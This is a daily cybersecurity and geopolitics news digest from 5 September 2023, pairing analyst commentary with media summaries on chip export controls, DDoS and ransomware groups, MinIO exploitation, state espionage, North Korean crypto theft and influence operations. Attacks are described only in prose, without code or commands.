Daily Drop (589): China's YMTC, NoName057(16), MSS: US Diplomacy, UK Military Data Breach, China & Japan, DPRK & RU, Graphcore Demands Inclusion, X: Biometrics, South Korea's Counteraction
09-05-23
Tuesday, Sep 05, 2023 // (IG): BB // Financial Enabler PODCAST // Coffee for Bob
China's YMTC Navigates US Restrictions
Analyst Comments: YMTC's ability to reduce its dependency on US and other foreign chip equipment suppliers is a testament to China's resilience and adaptability in the face of international trade challenges. This development could potentially undermine Washington's strategy of using export controls to decelerate China's advancements in chip manufacturing. With local vendors like Naura Technology and Advanced Micro-Fabrication Equipment stepping up, and the company's strategic moves to "de-Americanise" its production line, YMTC is positioning itself to compete with global giants like Samsung and Micron. The company's resurgence, backed by substantial government funding and strategic partnerships, underscores China's determination to bolster its domestic semiconductor industry.
FROM THE MEDIA: Yangtze Memory Technologies Corp (YMTC), China's premier memory-chip manufacturer, is set to commence operations at a new facility as early as next year. This move is seen as a significant boost to Beijing's ambition of achieving semiconductor self-reliance, especially amidst stringent US export controls. These US-imposed restrictions, initiated last October, had initially halted the construction of a state-of-the-art fabrication plant in Wuhan. However, YMTC has been rigorously testing locally produced tools and is now poised to depend more on domestic suppliers for replacements. This shift is anticipated to bring the new plant online by the latter half of 2024.
READ THE STORY: FT
NoName057(16): The Persistent Lone-Wolf in Cyber Warfare
Analyst Comments: NoName057(16) stands out in the cybercrime landscape due to its disciplined, methodical approach and its independence from other hacker groups. Their consistent attacks, even if not technically sophisticated, cause significant disruptions, underscoring the need for enhanced cybersecurity measures. The group's ability to rally volunteers and educate them on basic hacking concepts suggests a well-organized, motivated entity. Their focus on Western targets, especially those supporting Ukraine, indicates a geopolitical motive behind their operations. The group's persistence and determination to "respond in kind" to perceived anti-Russian actions suggest that they will remain a significant threat in the foreseeable future.
FROM THE MEDIA: NoName057(16), a Russian hacker group has been consistently launching distributed denial-of-service (DDoS) attacks on European entities, particularly financial institutions, government websites, and transportation services. Recently, they disrupted several banks and financial institutions in the Czech Republic and Poland, viewing them as adversaries due to their support for Ukraine. Unlike other pro-Kremlin hacktivist groups, NoName057(16) is unique in its operations. Pascal Geenens, the director of cyber threat intelligence at Radware, describes them as a "lone wolf" in the Russian cybercrime landscape. They don't form alliances with other hackers and have a custom-made toolkit, DDoSia, for their attacks. The group is methodical, targeting 5-15 entities daily after thorough reconnaissance. They also maintain a record of their successes on the Check Host website. Since the start of the year, they have claimed over 170 attacks, initially focusing on Ukrainian news sites before shifting to NATO-associated targets.
READ THE STORY: The Record
China’s Spy Agency Criticizes US Diplomacy; Hints at Risk to Upcoming Presidential Meeting
Analyst Comments: The strong response from China's primary intelligence agency underscores the complexities and sensitivities in the US-China relationship. The upcoming meeting between the two nations' leaders will be closely watched, as it could set the tone for future interactions and negotiations. The US's approach to Taiwan and other contentious issues will likely remain central points of contention.
FROM THE MEDIA: China's Ministry of State Security (MSS), the nation's primary intelligence agency, has expressed concerns over the US's recent diplomatic gestures, describing them as a blend of engagement and containment. This criticism suggests potential complications for a prospective meeting between Chinese President Xi Jinping and US President Joe Biden scheduled for November. The MSS's statement comes on the heels of a visit to Beijing by US Commerce Secretary Gina Raimondo. While Raimondo spoke positively of her interactions with Chinese officials, she also highlighted the growing perception among US businesses that China is becoming "uninvestable." The MSS's official WeChat account released a statement addressing recent visits by US officials to China, emphasizing that the Biden administration's approach seemed reminiscent of past US strategies, which combined "engagement and containment." The agency pointed to the US's approval of arms sales and military financing to Taiwan, a territory over which China claims sovereignty, as evidence of this mixed approach.
READ THE STORY: FT
MinIO Storage System Vulnerabilities Exploited by Hackers
Analyst Comments: The attack chain studied by Security Joes revealed that the threat actor weaponized these flaws to obtain admin credentials. They then abused this access to replace the MinIO client on the host with a trojanized version by triggering an update command specifying a MIRROR_URL. This deceptive update allowed the attacker to replace the genuine MinIO binary with a malicious counterpart, effectively compromising the system. The modified binary introduced an endpoint that receives and executes commands via HTTP requests, acting as a backdoor. These commands inherit the system permissions of the user who initiated the application. Interestingly, the altered binary version mirrors an exploit named Evil MinIO, which was made public on GitHub in early April 2023. However, there's no evidence linking the exploit's author to the attackers. The threat actor's proficiency in bash scripts and Python was evident, and they utilized the backdoor access to deploy additional payloads from a remote server for post-exploitation activities via a downloader script.
FROM THE MEDIA: Hackers have exploited high-severity security vulnerabilities in the MinIO high-performance object storage system, leading to unauthorized code execution on affected servers. The cybersecurity and incident response firm, Security Joes, reported that the intrusion used a publicly available exploit chain to compromise the MinIO instance. Two critical vulnerabilities, CVE-2023-28432 (with a CVSS score of 7.5) and CVE-2023-28434 (with a CVSS score of 8.8), were exploited. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the former to its Known Exploited Vulnerabilities (KEV) catalog on April 21, 2023. These vulnerabilities have the potential to expose sensitive information within the compromised installation and enable remote code execution (RCE) on the host where the MinIO application is running.
READ THE STORY: THN
UK Military Data Breach via Outdated Windows 7 System
Analyst Comments: The data breach at Zaun is a stark reminder of the vulnerabilities that outdated systems can introduce, even in high-security environments. The fact that a Windows 7 PC, for which mainstream support ended in 2015, was the entry point for the breach emphasizes the importance of regular software updates and system upgrades. The potential compromise of sensitive data related to military and research sites is alarming, especially given the strategic importance of such sites. This incident also highlights the need for companies, especially those in the supply chain, to ensure robust cybersecurity measures are in place. The targeted nature of the attack, focusing on a third-party supplier, underscores the evolving tactics of cybercriminals and the importance of securing every link in the supply chain.
FROM THE MEDIA: A UK-based supplier of high-security fencing, Zaun, which caters to military bases, suffered a data breach due to an outdated Windows 7 PC. The Wolverhampton-based company believes no classified information was compromised. However, reports suggest that the attackers might have accessed data that could potentially allow entry to some of the UK's most sensitive military and research sites. The LockBit Ransom group was identified as the perpetrators, and Zaun acknowledged the potential exfiltration of 10GB of data. The company also admitted that the breach might have extended beyond the initial Windows 7 entry point. Zaun has informed the National Cyber Security Centre (NCSC) and the UK's Information Commissioner's Office (ICO) about the incident.
READ THE STORY: The Register
U.S. Restricts Chip Exports to China Over Military Concerns
Analyst Comments: The U.S.'s decision to restrict chip exports is a significant move in the ongoing technological and geopolitical tussle between the two superpowers. By withholding access to advanced technology, the U.S. is signaling its intent to maintain a technological edge, especially in areas that have potential military implications. This move also underscores the importance of the semiconductor industry in global geopolitics and highlights the need for nations to bolster their domestic technological capabilities. The revelation of cyber intrusions faced by top U.S. officials further accentuates the multi-faceted nature of the U.S.-China rivalry, extending beyond trade and into the realms of cybersecurity and digital espionage.
FROM THE MEDIA: The U.S. has made a strategic decision to withhold the export of its top-tier supercomputer chips to China. This move, confirmed by U.S. Secretary of Commerce, Gina Raimondo, is rooted in concerns over potential military applications of these chips by China. Amidst escalating U.S.-China tensions, Raimondo's recent statements emphasize America's intent to limit China's military capabilities. The U.S. aims to "choke" China's military growth by preventing access to advanced American technology. Despite the challenges, including a cyber intrusion Raimondo faced from Chinese sources during her diplomatic trip to Beijing, the U.S. remains committed to its stance.
READ THE STORY: tom'sHARDWARE
Suspected Chinese Cyber Espionage Targets Japan's Cyber Security Agency
Analyst Comments: The breach at Japan's cyber security agency is a concerning development in the realm of international cyber espionage. The fact that the breach remained undetected for months highlights potential vulnerabilities in Japan's cyber defense mechanisms. The suspected involvement of Chinese state-backed hackers further complicates the geopolitical landscape, especially given the ongoing tensions in the Indo-Pacific region. The repeated breaches, as indicated by the Washington Post report and the recent Financial Times revelations, suggest a systematic effort by Chinese hackers to test and exploit Japan's cyber defenses. The timing of these breaches is also crucial. With escalating tensions over Taiwan and the importance of intelligence sharing between the US and Japan, the security of Japan's cyber infrastructure becomes even more critical. The US's potential reconsideration of intelligence sharing with Japan, due to these breaches, could have significant implications for regional security dynamics.
FROM THE MEDIA: Japan's national cyber security agency experienced a significant security breach in October 2022, which was only disclosed in August 2023. Anonymous sources have informed the Financial Times that state-backed Chinese hackers are believed to be responsible for this breach. The National Center of Incident Readiness and Strategy for Cybersecurity (NISC) has not officially attributed the attack to any group. However, these allegations are supported by a previous report from the Washington Post, which claimed that Chinese hackers had infiltrated Japan's defense network in 2020 and remained undetected for years.
READ THE STORY: CPO
North Korea's Kim to Discuss Arms Sales with Russia
Analyst Comments: The potential meeting between Kim Jong Un and Vladimir Putin could have significant geopolitical implications. If the two leaders discuss and agree upon arms sales, it would mark a significant escalation in military ties between North Korea and Russia. This comes at a time when Moscow's forces are trying to counteract a Ukrainian counteroffensive in the southern and eastern parts of the country. The U.S. is particularly alarmed by the possibility of increased weapons trade between the two nations, especially given the current dynamics of the Ukraine conflict. The visit by Sergei Shoigu, the Russian defense minister, to North Korea last month, where he reportedly tried to secure artillery ammunition for Russia, underscores the urgency of the situation. The White House's National Security Council spokesperson, Adrienne Watson, has urged North Korea to halt its arms negotiations with Russia.
FROM THE MEDIA: Kim Jong Un, North Korea's leader, is reportedly planning a visit to Russia to discuss potential weapons sales with Russian President Vladimir Putin. This information comes from a senior White House official and highlights the increasing military ties between Russia and North Korea, especially as Russian forces face challenges in Ukraine. The U.S. has expressed concerns over the potential growth of arms trade between Moscow and Pyongyang during this critical phase of the Ukraine conflict.
READ THE STORY: FT
Russian Data Localization Laws Bite
Analyst Comments: The imposition of these fines on such prominent platforms signals Russia's intent to strictly enforce its data localization laws. For international companies operating in or considering entering the Russian market, this development serves as a stark reminder of the importance of understanding and complying with local data regulations. The fines, although significant, might not be debilitating for these tech giants, but the reputational impact and the potential for stricter future regulations or even bans cannot be overlooked.
FROM THE MEDIA: In a recent move underscoring the strict enforcement of data localization laws in Russia, a Moscow court has fined two major tech platforms: Match Group's Tinder and the streaming service Twitch. Tinder has been slapped with a 10 million rouble (approximately $104,000) fine, while Twitch faces a slightly steeper penalty of 13 million roubles (around $135,000). These fines were levied due to the companies' repeated failures to store Russian users' data within the country, a mandate set by Russian data localization regulations.
READ THE STORY: THN
Graphcore Demands Inclusion in UK's £900mn Supercomputer Project
Analyst Comments: Graphcore's push for a significant role in the UK's supercomputer project underscores the challenges faced by tech start-ups in securing government contracts, especially when competing against global giants. The company's potential move to the US highlights the broader issue of tech companies seeking more favorable environments, both financially and regulatory, to grow and compete on the global stage. The UK government's decision on this matter will not only impact Graphcore but could set a precedent for how the country supports domestic tech innovations in the face of international competition.
FROM THE MEDIA: Graphcore, one of the UK's leading tech start-ups, is pushing for its chips to be used in a significant portion of the UK government's new £900mn supercomputer project. This move comes as the company faces competition from US-based rivals, notably Nvidia. Nigel Toon, Graphcore's Chief Executive, has communicated to UK ministers the importance of this deal, especially at a time when the company's Silicon Valley investors are suggesting a potential relocation to the US to benefit from the country's generous semiconductor subsidies. The UK's planned "exascale" supercomputer, announced by UK Chancellor Jeremy Hunt, is intended to be several times more powerful than current UK capabilities. Its primary functions will be research in areas such as climate change, drug discovery, and artificial intelligence (AI).
READ THE STORY: FT
X (Formerly Twitter) to Collect Biometric Data from Premium Users to Combat
Analyst Comments: X's decision to collect biometric data underscores the platform's commitment to enhancing user security. By targeting impersonation and fraud, X aims to create a safer environment for its premium users. However, the move raises pertinent questions about user privacy, especially given the lack of clarity on data collection methods and retention durations. While the intention to bolster security is commendable, it's crucial for X to ensure transparency and address potential privacy concerns to maintain user trust. The addition of features like encrypted DMs and the emphasis on using only public data for AI training, as confirmed by CEO Elon Musk, are steps in the right direction.
FROM THE MEDIA: X, previously known as Twitter, has announced changes to its privacy policy that will allow the collection of biometric data from its users. This move aims to address issues of fraud and impersonation on the platform. The updated policy, which will be effective from September 29, 2023, states that with user consent, biometric information may be collected and used for safety, security, and identification purposes. The social media giant clarified to Bloomberg that this change will only affect premium users. The biometric matching process is intended to bolster the platform's security by countering impersonation attempts. Users will have the option to provide a government ID and a photo for identity matching or verification using their biometric data. However, the specifics of how this data will be collected and the duration of its retention remain unclear.
READ THE STORY: THN
Boosting Cybersecurity Diversity: Craigslist Founder's Generous Donation
Analyst Comments: Craig Newmark's donation underscores the importance of diversifying the cybersecurity workforce. By supporting HBCUs, Newmark is not only investing in the future of cybersecurity but also ensuring that underrepresented groups have a seat at the table. The collaboration between HBCUs and cybersecurity firms will provide students with invaluable real-world experiences and insights, preparing them for a thriving career in the sector. As the demand for cybersecurity professionals continues to grow, initiatives like these are crucial for addressing the talent gap and ensuring a holistic approach to cybersecurity challenges.
FROM THE MEDIA: Craig Newmark, the founder of Craigslist, has generously donated $200,000 to a cybersecurity initiative at historically black colleges and universities (HBCUs). This initiative aims to provide more opportunities for Black students in the cybersecurity domain. Newmark's philanthropic endeavors through his organization, Craig Newmark Philanthropies, have consistently focused on expanding the U.S. cyber workforce. On August 28, the National Cybersecurity Alliance (NCA) received the grant, which will support the "See Yourself In Cyber" HBCU Career Program. This program, funded by entities like the Cybersecurity and Infrastructure Security Agency (CISA) and Dell, offers students networking opportunities, mentorship programs, training sessions, and interactions with cybersecurity experts.
READ THE STORY: The Record
Rethinking IT Qualifications: Are Open-Book Exams the Future
Analyst Comments: In today's digital age, where vast amounts of information are at one's fingertips, the real skill lies in effectively searching, filtering, and synthesizing this data. While formal qualifications might offer a foundational understanding, they might not necessarily equip an individual to navigate the ever-evolving IT realm. Microsoft's initiative of open-book exams is a commendable step, albeit restricted to its ecosystem. The article advocates for a holistic, vendor-neutral system that fosters continuous learning, catering to individuals at various career stages. While the tech sector has the resources to establish such an educational framework, the motivation to actualize it is still in question.
FROM THE MEDIA: Rupert Goodwins, in his article on "The Register," critically examines the changing dynamics of IT qualifications, particularly focusing on Microsoft's transition to open-book exams, the capability of ChatGPT to clear law exams, and the persistent challenge in recruiting adept IT personnel. Goodwins posits that the traditional examination system may be outdated, especially when artificial intelligence like ChatGPT can successfully pass them. In today's digital age, where information is ubiquitously available, the emphasis should be on an individual's ability to efficiently search, filter, and synthesize information rather than just possessing it. While Microsoft's open-book exams are a commendable initiative, they are confined to Microsoft's ecosystem, limiting their broader applicability.
READ THE STORY: The Register
The Evolving Cyber Tactics of Russia: A Deep Dive into the "Infamous Chisel" Malware
Analyst Comments: The 'Infamous Chisel' malware comprises several components, each serving a distinct function. Notably, one component, 'stl', collects data related to the device's connection to the Starlink satellite constellation. Given the Ukrainian forces' reliance on SpaceX’s Starlink for communication, especially in areas with compromised connectivity, this component's inclusion is particularly concerning. Paul Chichester, the director of operations at the NCSC, emphasized that this campaign signifies a new phase in Russia's cyber strategies against Ukraine and its allies. The UK remains committed to supporting Ukraine against such cyber threats and will continue to expose and counter Russian cyber aggression.
FROM THE MEDIA: The UK’s National Cyber Security Centre (NCSC), in collaboration with various partners, has unveiled a report detailing a new malware, named 'Infamous Chisel', linked to the Sandworm group, which is specifically targeting Ukrainian military Android devices. This malware is designed to steal information and has been discovered on devices used by Ukrainian military personnel on the front lines. Despite its relatively standard components and intermediate sophistication, the malware poses a significant threat due to the potential exfiltration of sensitive Ukrainian military data. Interestingly, the malware made no significant efforts to hide its activities, suggesting a bold approach by its creators.
READ THE STORY: Tech Central
South Korea's Counteraction Against North Korea's Crypto Exploits
Analyst Comments: South Korean intelligence reports indicate that North Korea successfully stole approximately $1.28 billion in Bitcoin and Ethereum in 2022 alone. Yoon Han-hong of the People Power Party pointed out that an estimated $52.46 million from North Korean crypto hacking activities likely passed through South Korean cryptocurrency exchanges. This is further underscored by the fact that North Korean hackers have reportedly accumulated over $3 billion over the past five years, with a significant portion of these funds being funneled into North Korea's missile program. In addition to the new bill, the Yoon administration is also planning to establish a national cybersecurity committee under the president's direct oversight. This committee's primary objective is to enhance South Korea's defenses against foreign cyberattacks.
FROM THE MEDIA: South Korea is escalating its efforts to counter North Korea's exploitation of cryptocurrencies to finance its prohibited weapons programs. On August 29, South Korean President Yoon Suk Yeol unveiled a new bill specifically targeting North Korean virtual assets, following 10 months of intensive discussions to reinforce South Korea's existing sanctions against North Korea. The revised bill, which was previously sent back by the president for further enhancement, now includes specific strategies to "track and neutralize" cryptocurrencies that North Korea has illicitly acquired through cyberattacks. The president emphasized the importance of actively deterring North Korea from various illegal activities, including cryptocurrency theft, which serves as a primary funding source for its nuclear and missile development.
READ THE STORY: BE(IN)CRYPTO
Meta Disrupts Major Disinformation Campaigns from China and Russia
Analyst Comments: The revelation by Meta underscores the persistent threat of disinformation campaigns on major social media platforms. The scale and scope of these operations, especially the Chinese campaign targeting over 50 apps, highlight the challenges faced by tech companies in identifying and countering such covert activities. The association of the Chinese operation with individuals linked to law enforcement raises concerns about state-sponsored disinformation campaigns. The Russian operation's focus on creating fake news articles to influence perceptions about the conflict in Ukraine demonstrates the geopolitical implications of such campaigns. Both operations, despite their vast networks, seem to have limited engagement among genuine communities, indicating the platforms' increasing ability to detect and counter such activities.
FROM THE MEDIA: Meta, the parent company of Facebook, has announced the disruption of two significant covert influence operations originating from China and Russia. The company has blocked thousands of accounts and pages linked to these campaigns across its platform. The Chinese disinformation group targeted over 50 apps, including major platforms like Facebook, Instagram, YouTube, TikTok, and Reddit. Guy Rosen, the Chief Information Security Officer at Meta, revealed that the network consisted of 7,704 Facebook accounts, 954 Pages, 15 Groups, and 15 Instagram accounts. These accounts were operated by individuals dispersed across China and posted content related to China, its province Xinjiang, criticism of the U.S and Western foreign policies, and critics of the Chinese government. The operation, named Spamouflage (or DRAGONBRIDGE), has been active since 2018 and has links to individuals associated with Chinese law enforcement.
READ THE STORY: THN
Items of interest
Strengthening Ties: India-Africa's Evolving Partnership
Analyst Comments: The India-Africa relationship is evidently on an upward trajectory, with both regions recognizing the mutual benefits of collaboration. The challenges posed by global events have only underscored the importance of their partnership. While the past has seen fruitful collaborations, especially in development and capacity-building, the future holds promise in newer areas like the blue economy and media. The emphasis on creating a multipolar world order indicates a shared vision for global balance and equity. However, the success of this partnership will hinge on addressing challenges, leveraging opportunities like the AfCFTA, and ensuring that collaborations align with the unique needs and aspirations of both regions.
FROM THE MEDIA: In a recent interview with Kester Kenn Klomegah, Samir Bhattacharya from the Vivekananda International Foundation delved into the intricate dynamics of the India-Africa relationship amidst the changing global landscape. The world, reeling from the impacts of the COVID-19 pandemic and the Ukraine conflict, has seen countries like Africa bearing the brunt of rising costs and humanitarian crises. In these turbulent times, India's role in Africa's reconstruction has become paramount. Their partnership has grown organically over the years, encompassing developmental projects, military collaborations, and capacity-building initiatives. The Export-Import Bank of India has emerged as a significant financier for African projects, and there's a mutual emphasis on skill development, especially with the onset of the fourth industrial revolution.
READ THE STORY: ModernDiplomacy
How Africans see Chinese and Indians in Africa (Video)
FROM THE MEDIA: Chinese and Indian foreigners you will find the most in Africa, but what do Africans think about them?
How India and Africa are planning to deepen defense cooperation (Video)
FROM THE MEDIA: As India and the African Union held their first Army exercise in Pune, watch #ThePrint #Defencescope by Deputy Editor Snehesh Alex Philip and Senior Multimedia Editor Sajid AliMir to know how India & Africa are planning to deepen defense cooperation.
These open-source products are reviewed by analysts at InfoDom Securities, providing possible context about current media trends related to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in their original material or related links on their sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.